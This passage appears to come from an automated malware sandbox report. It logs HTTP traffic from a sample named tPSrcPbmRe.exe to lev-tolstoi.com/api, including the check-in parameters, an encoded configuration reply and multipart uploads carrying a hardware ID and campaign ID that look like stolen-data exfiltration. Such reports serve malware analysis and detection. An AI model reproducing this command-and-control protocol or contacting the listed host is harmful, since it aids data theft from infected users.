                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkow8Zhr9qIfjxYwwLIQjYRRIwD60cOft5O33LMqIpvHFx3hg86Ye1YRY7%2FgRjsehUQRhYMvKd2xOSTqLwpmMd7YiumPz4XfuXy1Gsi2I6vvdWQsDKxvnQPeIA3LrvzFrFI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662eb85bc91a2c-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1807&rtt_var=705&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1522419&cwnd=174&unsent_bytes=0&cid=70c74e28ed672812&ts=765&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:09:23 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                                  2024-12-23 06:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  2192.168.2.649712104.21.66.864436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:24 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 47
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:24 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:25 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=ohsnqqnu7jnc71nvsi03ldak1u; expires=Thu, 17 Apr 2025 23:56:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyIj6A3%2Bfh49YFsk4lENgqkXKjyFsTOtXyMV43NMj%2B%2Fh5HvQC0AN5TrxXJNoEtfcSeZ6Fo1ln5Rsatx6jz97VFVqx20yTKstCITxO%2BiaeKXQGORt%2FlwmEvopfn8HHVwKz1s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662ec4ec614235-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1551&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=946&delivery_rate=1782661&cwnd=248&unsent_bytes=0&cid=6cb3b2a5177abf8d&ts=790&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC242INData Raw: 34 36 62 0d 0a 36 7a 4f 71 2b 50 51 2f 6d 44 37 58 61 36 57 33 6d 4f 56 58 62 71 55 38 77 38 53 63 46 53 49 63 47 53 34 46 53 46 66 33 46 79 2b 51 45 64 7a 61 7a 67 75 30 48 4b 51 4f 68 34 33 73 6c 79 49 4c 69 52 36 69 6f 4c 34 76 52 48 31 31 58 57 42 6b 64 59 46 36 44 64 46 56 79 35 53 48 57 72 51 63 73 68 4f 48 6a 63 4f 65 64 51 76 4c 48 76 6e 6d 2b 58 39 41 66 58 56 4d 5a 43 4d 34 68 33 74 4d 67 31 2f 4e 6b 4a 46 63 2f 46 2b 37 42 73 44 53 2f 59 51 39 41 4d 78 52 71 36 6d 2b 4f 51 42 35 59 77 77 2f 61 68 71 53 59 30 36 6d 55 74 6d 54 31 6b 4b 30 52 66 55 4f 79 35 57 69 78 7a 59 4c 78 31 43 6c 6f 50 64 39 53 6e 52 39 54 57 45 69 4a 35 35 78 52 34 4e 52 7a 70 47 62 56 65 68 53 73 51 48 4c 31 50 65 45 64 55 4b 48 57
                                                                                                                                                                                                                                                                  Data Ascii: 46b6zOq+PQ/mD7Xa6W3mOVXbqU8w8ScFSIcGS4FSFf3Fy+QEdzazgu0HKQOh43slyILiR6ioL4vRH11XWBkdYF6DdFVy5SHWrQcshOHjcOedQvLHvnm+X9AfXVMZCM4h3tMg1/NkJFc/F+7BsDS/YQ9AMxRq6m+OQB5Yww/ahqSY06mUtmT1kK0RfUOy5WixzYLx1CloPd9SnR9TWEiJ55xR4NRzpGbVehSsQHL1PeEdUKHW
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC896INData Raw: 62 6e 6d 70 6a 63 54 54 48 68 64 64 6a 38 34 68 58 4d 4e 6c 68 2f 52 32 70 46 52 75 67 54 31 41 63 76 62 2f 34 51 36 43 38 5a 65 73 36 6e 2b 64 45 68 32 66 30 5a 6f 4a 54 71 62 66 30 71 42 57 4d 2b 56 6b 56 58 38 55 37 5a 4a 69 5a 58 39 6e 33 56 55 68 33 36 78 70 66 31 6a 54 57 38 37 55 79 6b 7a 64 5a 4a 35 44 64 45 52 7a 70 53 58 55 50 70 4f 76 51 4c 4d 30 4f 69 4d 50 41 48 4b 58 71 79 73 38 58 52 41 65 58 46 47 61 43 41 78 6d 48 68 4c 69 56 47 49 31 4e 5a 61 34 68 7a 74 53 65 54 51 36 6f 41 35 47 6f 56 6b 34 62 6d 77 62 67 42 35 64 77 77 2f 61 6a 32 51 64 6b 36 43 58 73 75 53 6e 55 2f 36 54 72 4d 45 77 73 66 38 67 6a 73 47 78 45 79 72 71 50 68 30 53 58 56 79 53 57 41 75 64 64 73 31 53 70 45 52 6b 4e 71 33 55 50 46 51 76 78 37 48 6c 65 58 4a 4c 45 7a 41
                                                                                                                                                                                                                                                                  Data Ascii: bnmpjcTTHhddj84hXMNlh/R2pFRugT1Acvb/4Q6C8Zes6n+dEh2f0ZoJTqbf0qBWM+VkVX8U7ZJiZX9n3VUh36xpf1jTW87UykzdZJ5DdERzpSXUPpOvQLM0OiMPAHKXqys8XRAeXFGaCAxmHhLiVGI1NZa4hztSeTQ6oA5GoVk4bmwbgB5dww/aj2Qdk6CXsuSnU/6TrMEwsf8gjsGxEyrqPh0SXVySWAudds1SpERkNq3UPFQvx7HleXJLEzA
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC1369INData Raw: 34 34 62 31 0d 0a 4a 55 4b 61 77 76 6d 67 4f 5a 7a 74 4c 61 32 70 74 31 58 70 43 68 6c 6e 49 6d 35 4a 51 2f 6c 32 34 42 63 37 57 39 6f 73 39 41 63 74 61 72 71 37 32 64 45 68 73 64 55 4a 68 4c 44 57 51 4e 51 50 4a 56 74 44 61 7a 68 33 65 55 71 49 64 7a 4a 66 50 68 44 73 43 77 45 6a 68 75 62 42 75 41 48 6c 33 44 44 39 71 4f 35 68 2b 51 59 35 59 79 5a 6d 57 56 2f 52 54 76 77 48 50 31 66 65 47 50 67 54 42 55 36 71 70 38 58 42 49 66 58 64 4a 61 69 6c 31 32 7a 56 4b 6b 52 47 51 32 72 4e 54 2b 55 32 6b 53 2f 4c 57 39 49 6b 79 47 6f 64 42 37 37 2b 2b 63 45 77 2b 49 77 78 74 4c 54 4b 52 65 45 65 4b 56 63 79 58 6d 56 54 7a 56 61 63 44 79 39 76 6f 69 6a 38 4a 79 56 4b 6b 71 66 35 32 51 58 42 78 52 79 64 6b 64 5a 4a 74 44 64 45 52 35 35 65 47 54 2f 42 58 70 45 76 79
                                                                                                                                                                                                                                                                  Data Ascii: 44b1JUKawvmgOZztLa2pt1XpChlnIm5JQ/l24Bc7W9os9Actarq72dEhsdUJhLDWQNQPJVtDazh3eUqIdzJfPhDsCwEjhubBuAHl3DD9qO5h+QY5YyZmWV/RTvwHP1feGPgTBU6qp8XBIfXdJail12zVKkRGQ2rNT+U2kS/LW9IkyGodB77++cEw+IwxtLTKReEeKVcyXmVTzVacDy9voij8JyVKkqf52QXBxRydkdZJtDdER55eGT/BXpEvy
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC1369INData Raw: 56 55 68 33 47 69 73 50 51 33 58 7a 42 69 44 47 41 6d 64 63 30 31 52 34 56 56 79 35 61 66 55 66 64 64 73 51 37 4b 30 66 71 42 4d 77 6e 47 56 61 6d 71 38 58 31 4d 65 6e 64 46 59 53 59 32 6c 6e 4d 4e 78 78 48 50 67 74 59 46 75 6e 32 34 41 73 76 56 2b 5a 59 79 54 49 6b 65 72 36 44 2b 4e 78 68 6f 61 31 74 67 4e 58 75 4d 4e 55 71 46 45 5a 44 61 6e 45 2f 2f 55 72 45 44 77 74 48 32 6a 54 55 4a 31 56 61 6e 6f 66 4a 2f 52 58 46 39 53 57 6f 74 50 70 5a 6e 58 34 70 56 78 70 62 57 45 37 70 62 72 55 6d 66 6c 64 2b 51 4e 68 7a 42 58 65 47 35 73 47 34 41 65 58 63 4d 50 32 6f 31 6d 33 6c 47 6a 6c 72 44 6e 70 4a 64 39 31 65 37 42 38 37 5a 38 6f 73 79 48 73 70 62 71 61 7a 33 63 6b 78 7a 65 46 35 6b 4b 33 58 62 4e 55 71 52 45 5a 44 61 73 57 37 4e 66 2f 55 57 69 63 79 36 67
                                                                                                                                                                                                                                                                  Data Ascii: VUh3GisPQ3XzBiDGAmdc01R4VVy5afUfddsQ7K0fqBMwnGVamq8X1MendFYSY2lnMNxxHPgtYFun24AsvV+ZYyTIker6D+Nxhoa1tgNXuMNUqFEZDanE//UrEDwtH2jTUJ1VanofJ/RXF9SWotPpZnX4pVxpbWE7pbrUmfld+QNhzBXeG5sG4AeXcMP2o1m3lGjlrDnpJd91e7B87Z8osyHspbqaz3ckxzeF5kK3XbNUqREZDasW7Nf/UWicy6g
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC1369INData Raw: 65 6a 61 58 78 66 41 42 68 4e 56 55 6e 4c 54 6e 56 4c 51 32 4f 57 63 43 55 6c 56 76 78 55 4c 6b 49 7a 74 50 2f 6a 7a 49 44 77 46 65 6d 70 76 68 6c 52 33 4e 79 54 47 77 6a 50 35 46 30 52 73 6b 66 69 4a 32 4f 48 61 49 63 68 77 37 52 78 66 6e 48 4b 6b 4c 65 48 71 61 71 76 69 38 41 63 32 6c 4e 59 6a 67 78 6d 6e 35 66 67 6c 66 49 6e 34 52 61 39 6c 61 36 43 73 2f 59 2b 59 38 6e 44 4d 70 65 73 37 54 34 66 45 34 2b 4e 51 78 67 4d 6e 58 4e 4e 58 79 65 57 6f 69 46 32 45 53 36 57 37 6c 4a 6e 35 58 35 6a 54 67 43 31 56 71 6e 72 66 31 35 53 48 74 7a 53 47 30 6e 4f 70 35 2f 52 49 46 52 78 35 2b 65 56 76 78 53 74 41 2f 4c 32 4c 72 4a 64 51 76 66 48 76 6e 6d 32 57 31 4e 65 47 78 64 55 69 30 31 78 44 56 53 78 30 69 49 6e 5a 6f 64 6f 68 79 34 42 63 33 59 2f 34 4d 39 43 38
                                                                                                                                                                                                                                                                  Data Ascii: ejaXxfABhNVUnLTnVLQ2OWcCUlVvxULkIztP/jzIDwFempvhlR3NyTGwjP5F0RskfiJ2OHaIchw7RxfnHKkLeHqaqvi8Ac2lNYjgxmn5fglfIn4Ra9la6Cs/Y+Y8nDMpes7T4fE4+NQxgMnXNNXyeWoiF2ES6W7lJn5X5jTgC1Vqnrf15SHtzSG0nOp5/RIFRx5+eVvxStA/L2LrJdQvfHvnm2W1NeGxdUi01xDVSx0iInZodohy4Bc3Y/4M9C8
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC1369INData Raw: 76 6e 42 4d 50 69 4d 4d 61 53 63 7a 6c 48 52 46 67 56 48 4f 6b 4a 4a 65 38 31 2b 79 41 4d 48 65 2b 59 30 36 43 38 46 61 6f 61 33 35 65 55 5a 37 63 45 55 6e 5a 48 57 53 62 51 33 52 45 65 36 35 68 45 2f 49 55 72 59 53 68 38 71 30 6e 6e 55 4c 79 78 37 35 35 76 56 2f 54 32 78 2b 52 57 38 75 50 4a 56 78 52 34 52 57 79 4a 2b 62 57 50 35 53 73 51 37 48 32 66 57 41 50 51 50 44 58 71 37 6d 73 44 64 48 5a 6a 73 55 4a 77 6f 2b 67 31 52 44 67 6b 4f 49 68 64 68 45 75 6c 75 35 53 5a 2b 56 39 49 34 30 42 4d 6c 53 71 61 4c 73 64 30 74 33 64 45 31 6f 4b 6a 61 55 66 30 57 62 56 38 69 52 6e 6c 72 79 57 4c 73 62 78 74 71 36 79 58 55 4c 33 78 37 35 35 73 39 68 52 33 6c 30 44 6b 34 74 4c 70 52 2f 54 6f 4a 64 69 49 58 59 52 4c 70 62 75 55 6d 66 6c 66 65 4c 4f 41 6a 56 55 71 47
                                                                                                                                                                                                                                                                  Data Ascii: vnBMPiMMaSczlHRFgVHOkJJe81+yAMHe+Y06C8Faoa35eUZ7cEUnZHWSbQ3REe65hE/IUrYSh8q0nnULyx755vV/T2x+RW8uPJVxR4RWyJ+bWP5SsQ7H2fWAPQPDXq7msDdHZjsUJwo+g1RDgkOIhdhEulu5SZ+V9I40BMlSqaLsd0t3dE1oKjaUf0WbV8iRnlryWLsbxtq6yXUL3x755s9hR3l0Dk4tLpR/ToJdiIXYRLpbuUmflfeLOAjVUqG
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC1369INData Raw: 44 35 77 51 6d 49 72 4f 5a 39 79 51 35 74 51 77 70 61 58 57 76 31 58 70 77 4c 56 33 76 4b 45 4f 77 54 4f 58 71 2b 6d 2f 33 70 41 50 6a 55 4d 59 44 4a 31 7a 54 56 6f 71 6b 62 65 6b 4e 52 2b 37 55 71 2f 44 73 76 44 38 59 59 32 47 73 70 4f 34 65 69 2b 5a 6b 64 76 4f 78 52 78 4f 69 4b 53 61 67 4f 51 45 63 2b 57 31 67 57 36 56 37 6f 48 79 74 37 2b 6a 6a 41 45 78 46 75 6b 72 50 4a 37 51 58 5a 79 52 6d 49 76 4d 35 39 32 51 34 5a 51 78 4a 36 66 55 2f 4d 63 2b 30 6e 41 7a 62 72 66 64 54 72 58 57 62 6d 72 37 6a 56 79 66 57 70 64 63 69 63 6c 6b 7a 64 69 69 6c 33 4c 6e 35 46 4e 75 6b 50 37 45 49 66 53 39 73 64 74 54 4d 64 61 72 61 58 35 65 55 39 7a 64 45 74 73 4a 54 2b 62 5a 30 4b 4d 57 63 53 53 6d 30 2f 77 56 71 63 41 7a 74 6a 30 6a 79 63 50 68 78 44 68 6f 65 59 33
                                                                                                                                                                                                                                                                  Data Ascii: D5wQmIrOZ9yQ5tQwpaXWv1XpwLV3vKEOwTOXq+m/3pAPjUMYDJ1zTVoqkbekNR+7Uq/DsvD8YY2GspO4ei+ZkdvOxRxOiKSagOQEc+W1gW6V7oHyt7+jjAExFukrPJ7QXZyRmIvM592Q4ZQxJ6fU/Mc+0nAzbrfdTrXWbmr7jVyfWpdciclkzdiil3Ln5FNukP7EIfS9sdtTMdaraX5eU9zdEtsJT+bZ0KMWcSSm0/wVqcAztj0jycPhxDhoeY3
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC1369INData Raw: 49 6c 47 79 4f 59 5a 55 36 4d 56 76 61 6b 6d 46 72 75 57 37 73 50 78 35 57 30 78 7a 70 4d 6e 32 66 68 37 72 35 49 44 6a 35 6a 44 44 39 71 41 4a 5a 37 51 34 35 48 32 64 65 31 53 75 78 57 72 6b 76 68 30 75 75 4f 49 77 48 56 48 75 2f 6d 2b 44 63 59 4c 6a 55 4d 59 7a 74 31 7a 53 55 66 30 67 53 62 7a 63 59 50 35 52 4b 73 53 64 47 56 6f 74 56 37 54 4e 55 65 2b 65 61 35 64 46 4a 73 66 55 39 78 4b 58 4b 72 53 32 32 43 52 38 6d 58 6e 56 48 45 59 71 41 4b 79 64 76 39 6b 53 52 4d 69 52 36 75 35 71 5a 4f 41 44 59 37 63 79 6c 71 4c 64 55 74 44 62 78 53 78 70 53 52 53 2b 73 52 6c 51 4c 52 31 50 65 4d 4f 55 37 47 55 37 47 68 76 6a 6b 41 65 44 73 55 4e 32 52 31 6b 57 51 4e 30 51 47 61 77 63 4d 4f 72 51 7a 6e 46 6f 6e 4d 75 70 46 31 56 4a 55 51 34 62 53 2b 4c 77 41 35 65
                                                                                                                                                                                                                                                                  Data Ascii: IlGyOYZU6MVvakmFruW7sPx5W0xzpMn2fh7r5IDj5jDD9qAJZ7Q45H2de1SuxWrkvh0uuOIwHVHu/m+DcYLjUMYzt1zSUf0gSbzcYP5RKsSdGVotV7TNUe+ea5dFJsfU9xKXKrS22CR8mXnVHEYqAKydv9kSRMiR6u5qZOADY7cylqLdUtDbxSxpSRS+sRlQLR1PeMOU7GU7GhvjkAeDsUN2R1kWQN0QGawcMOrQznFonMupF1VJUQ4bS+LwA5e
                                                                                                                                                                                                                                                                  2024-12-23 06:09:25 UTC1369INData Raw: 32 68 48 5a 4e 67 68 47 47 32 70 41 64 6f 67 37 37 53 63 50 45 75 74 39 6c 58 70 77 4c 38 76 47 75 4a 56 38 77 59 67 78 78 61 6d 33 48 4f 77 32 62 45 5a 44 61 30 56 37 6f 54 72 4d 4b 30 64 61 39 75 51 73 71 78 46 6d 6e 70 66 42 67 55 54 78 55 54 32 77 6d 4f 5a 4a 6a 63 37 64 45 79 35 53 59 57 75 78 4e 39 55 65 48 32 72 72 66 44 45 7a 57 56 4b 62 71 74 6a 74 52 62 58 56 48 63 53 31 31 71 6a 73 4e 6b 52 47 51 32 71 4e 65 39 46 4b 79 48 39 61 59 33 49 51 79 43 73 52 51 74 72 65 2b 4f 51 42 34 4f 78 51 31 5a 48 57 52 5a 41 33 52 41 5a 72 42 77 77 36 74 44 4f 63 57 69 63 79 36 6b 58 56 55 6c 42 44 68 74 4c 34 76 41 44 6c 31 51 57 59 70 4f 35 5a 6e 58 34 39 53 33 70 6e 52 59 38 52 35 75 41 54 43 32 2f 32 35 43 79 33 4e 54 71 79 70 2b 55 6c 2b 53 57 70 4c 64 32
                                                                                                                                                                                                                                                                  Data Ascii: 2hHZNghGG2pAdog77ScPEut9lXpwL8vGuJV8wYgxxam3HOw2bEZDa0V7oTrMK0da9uQsqxFmnpfBgUTxUT2wmOZJjc7dEy5SYWuxN9UeH2rrfDEzWVKbqtjtRbXVHcS11qjsNkRGQ2qNe9FKyH9aY3IQyCsRQtre+OQB4OxQ1ZHWRZA3RAZrBww6tDOcWicy6kXVUlBDhtL4vADl1QWYpO5ZnX49S3pnRY8R5uATC2/25Cy3NTqyp+Ul+SWpLd2


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  3192.168.2.649718104.21.66.864436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:27 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=QA0GZX9INMITFNAV1T
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 12859
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:27 UTC12859OUTData Raw: 2d 2d 51 41 30 47 5a 58 39 49 4e 4d 49 54 46 4e 41 56 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 30 46 41 36 42 45 32 39 45 42 41 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 41 30 47 5a 58 39 49 4e 4d 49 54 46 4e 41 56 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 41 30 47 5a 58 39 49 4e 4d 49 54 46 4e 41 56 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                                                                                                                                                  Data Ascii: --QA0GZX9INMITFNAV1TContent-Disposition: form-data; name="hwid"5590FA6BE29EBA19AC8923850305D13E--QA0GZX9INMITFNAV1TContent-Disposition: form-data; name="pid"2--QA0GZX9INMITFNAV1TContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                                                                                                                                                  2024-12-23 06:09:28 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=v0v5dh5kc774jtar4ia3qlq8dr; expires=Thu, 17 Apr 2025 23:56:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T4gbhtYz2z5Mb1olwpHVv0JrjqCDW6uKODfKAGtBhTUqJfJpK%2Fp%2FNs2Is7%2Fjg31ONmQlNmPzQRjU0XXttMNXmmrsl1JlI0xK8xJ23Wk1YPVzkl2ynfElibDtH2tuxxGwV3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662ed3683e4376-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2081&min_rtt=1556&rtt_var=1635&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13798&delivery_rate=506680&cwnd=247&unsent_bytes=0&cid=bca83faa465a522d&ts=972&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:09:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                  2024-12-23 06:09:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  4192.168.2.649724104.21.66.864436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:29 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=IC694IXKWB
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 15057
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:29 UTC15057OUTData Raw: 2d 2d 49 43 36 39 34 49 58 4b 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 30 46 41 36 42 45 32 39 45 42 41 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 43 36 39 34 49 58 4b 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 43 36 39 34 49 58 4b 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 49 43 36 39 34 49 58 4b 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                                  Data Ascii: --IC694IXKWBContent-Disposition: form-data; name="hwid"5590FA6BE29EBA19AC8923850305D13E--IC694IXKWBContent-Disposition: form-data; name="pid"2--IC694IXKWBContent-Disposition: form-data; name="lid"PsFKDg--pablo--IC694IXKWBContent-
                                                                                                                                                                                                                                                                  2024-12-23 06:09:30 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:30 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=ugrd0ro3g84bcemq8q06mpuvjm; expires=Thu, 17 Apr 2025 23:56:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNXCK8YR2xDgU3oMSIF0jzaP3u%2BYAapw42SOpv5NwUnI%2F9SoKr2D9rv9xRLnvx5NQIogLRcEL0%2F%2Bs2RJGuMXMmVEI2oNsfIopHMhwaZxPQVKkA%2BOqkoq6nZuN8Li2wdFwPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662ee2097e8c1e-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
